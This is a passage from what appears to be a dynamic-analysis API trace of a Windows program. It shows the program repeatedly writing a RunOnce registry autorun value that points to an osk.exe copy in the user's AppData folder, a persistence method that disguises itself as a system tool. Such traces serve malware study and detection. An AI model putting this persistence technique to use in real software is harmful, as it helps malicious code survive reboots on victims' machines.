(in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.651] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.651] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.651] KillTimer (hWnd=0x20280, uIDEvent=0x2179) returned 1 [0084.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.652] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.652] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.652] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.652] RegCloseKey (hKey=0x280) returned 0x0 [0084.653] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.653] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.653] SetTimer (hWnd=0x20280, nIDEvent=0x217a, uElapse=0xa, lpTimerFunc=0x0) returned 0x217a [0084.653] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.667] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.667] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.667] KillTimer (hWnd=0x20280, uIDEvent=0x217a) returned 1 [0084.667] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.668] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.668] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.668] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.668] RegCloseKey (hKey=0x280) returned 0x0 [0084.668] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.668] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.668] SetTimer (hWnd=0x20280, nIDEvent=0x217b, uElapse=0xa, lpTimerFunc=0x0) returned 0x217b [0084.669] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.682] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.682] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.682] KillTimer (hWnd=0x20280, uIDEvent=0x217b) returned 1 [0084.683] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.683] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.683] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.683] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.684] RegCloseKey (hKey=0x280) returned 0x0 [0084.684] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.684] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.684] SetTimer (hWnd=0x20280, nIDEvent=0x217c, uElapse=0xa, lpTimerFunc=0x0) returned 0x217c [0084.684] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.698] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.698] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.698] KillTimer (hWnd=0x20280, uIDEvent=0x217c) returned 1 [0084.698] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.699] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.699] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.699] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.699] RegCloseKey (hKey=0x280) returned 0x0 [0084.699] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.700] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.700] SetTimer (hWnd=0x20280, nIDEvent=0x217d, uElapse=0xa, lpTimerFunc=0x0) returned 0x217d [0084.700] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.713] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.713] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.714] KillTimer (hWnd=0x20280, uIDEvent=0x217d) returned 1 [0084.714] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.714] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.714] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.715] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.715] RegCloseKey (hKey=0x280) returned 0x0 [0084.715] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.715] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.715] SetTimer (hWnd=0x20280, nIDEvent=0x217e, uElapse=0xa, lpTimerFunc=0x0) returned 0x217e [0084.715] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.729] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.729] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.729] KillTimer (hWnd=0x20280, uIDEvent=0x217e) returned 1 [0084.730] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.730] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.730] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.730] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.731] RegCloseKey (hKey=0x280) returned 0x0 [0084.731] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.731] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.731] SetTimer (hWnd=0x20280, nIDEvent=0x217f, uElapse=0xa, lpTimerFunc=0x0) returned 0x217f [0084.731] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.745] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.745] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.745] KillTimer (hWnd=0x20280, uIDEvent=0x217f) returned 1 [0084.745] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.745] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.746] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.746] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.746] RegCloseKey (hKey=0x280) returned 0x0 [0084.746] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.746] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.746] SetTimer (hWnd=0x20280, nIDEvent=0x2180, uElapse=0xa, lpTimerFunc=0x0) returned 0x2180 [0084.746] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.760] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.760] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.760] KillTimer (hWnd=0x20280, uIDEvent=0x2180) returned 1 [0084.761] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.761] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.761] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.761] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.762] RegCloseKey (hKey=0x280) returned 0x0 [0084.762] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.762] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.762] SetTimer (hWnd=0x20280, nIDEvent=0x2181, uElapse=0xa, lpTimerFunc=0x0) returned 0x2181 [0084.762] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.776] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.776] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.776] KillTimer (hWnd=0x20280, uIDEvent=0x2181) returned 1 [0084.777] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.777] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.777] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.777] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.777] RegCloseKey (hKey=0x280) returned 0x0 [0084.778] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.778] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.778] SetTimer (hWnd=0x20280, nIDEvent=0x2182, uElapse=0xa, lpTimerFunc=0x0) returned 0x2182 [0084.778] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.791] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.792] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.792] KillTimer (hWnd=0x20280, uIDEvent=0x2182) returned 1 [0084.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.792] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.792] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.793] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.793] RegCloseKey (hKey=0x280) returned 0x0 [0084.793] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.793] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.793] SetTimer (hWnd=0x20280, nIDEvent=0x2183, uElapse=0xa, lpTimerFunc=0x0) returned 0x2183 [0084.793] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.807] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.807] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.807] KillTimer (hWnd=0x20280, uIDEvent=0x2183) returned 1 [0084.807] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.808] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.808] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.808] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.808] RegCloseKey (hKey=0x280) returned 0x0 [0084.809] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.809] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.809] SetTimer (hWnd=0x20280, nIDEvent=0x2184, uElapse=0xa, lpTimerFunc=0x0) returned 0x2184 [0084.809] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.823] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.823] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.823] KillTimer (hWnd=0x20280, uIDEvent=0x2184) returned 1 [0084.823] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.824] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.824] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.824] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.824] RegCloseKey (hKey=0x280) returned 0x0 [0084.824] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.824] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.824] SetTimer (hWnd=0x20280, nIDEvent=0x2185, uElapse=0xa, lpTimerFunc=0x0) returned 0x2185 [0084.824] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.838] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.838] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.838] KillTimer (hWnd=0x20280, uIDEvent=0x2185) returned 1 [0084.839] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.839] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.839] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.839] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.840] RegCloseKey (hKey=0x280) returned 0x0 [0084.840] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.840] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.840] SetTimer (hWnd=0x20280, nIDEvent=0x2186, uElapse=0xa, lpTimerFunc=0x0) returned 0x2186 [0084.840] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.854] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.854] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.855] KillTimer (hWnd=0x20280, uIDEvent=0x2186) returned 1 [0084.855] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.855] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.856] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.856] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.856] RegCloseKey (hKey=0x280) returned 0x0 [0084.856] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.856] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.856] SetTimer (hWnd=0x20280, nIDEvent=0x2187, uElapse=0xa, lpTimerFunc=0x0) returned 0x2187 [0084.856] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.870] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.870] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.870] KillTimer (hWnd=0x20280, uIDEvent=0x2187) returned 1 [0084.870] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.871] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.871] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.871] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.871] RegCloseKey (hKey=0x280) returned 0x0 [0084.871] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.871] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.871] SetTimer (hWnd=0x20280, nIDEvent=0x2188, uElapse=0xa, lpTimerFunc=0x0) returned 0x2188 [0084.872] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.885] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.885] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.885] KillTimer (hWnd=0x20280, uIDEvent=0x2188) returned 1 [0084.886] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.886] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.886] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.886] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.886] RegCloseKey (hKey=0x280) returned 0x0 [0084.887] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.887] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.887] SetTimer (hWnd=0x20280, nIDEvent=0x2189, uElapse=0xa, lpTimerFunc=0x0) returned 0x2189 [0084.887] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.901] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.901] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.901] KillTimer (hWnd=0x20280, uIDEvent=0x2189) returned 1 [0084.901] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.902] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.902] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.902] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.902] RegCloseKey (hKey=0x280) returned 0x0 [0084.902] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.902] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.903] SetTimer (hWnd=0x20280, nIDEvent=0x218a, uElapse=0xa, lpTimerFunc=0x0) returned 0x218a [0084.903] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.916] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.916] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.916] KillTimer (hWnd=0x20280, uIDEvent=0x218a) returned 1 [0084.917] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.917] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.917] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.917] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.918] RegCloseKey (hKey=0x280) returned 0x0 [0084.918] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.918] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.918] SetTimer (hWnd=0x20280, nIDEvent=0x218b, uElapse=0xa, lpTimerFunc=0x0) returned 0x218b [0084.918] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.932] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.932] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.932] KillTimer (hWnd=0x20280, uIDEvent=0x218b) returned 1 [0084.932] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.934] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.934] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 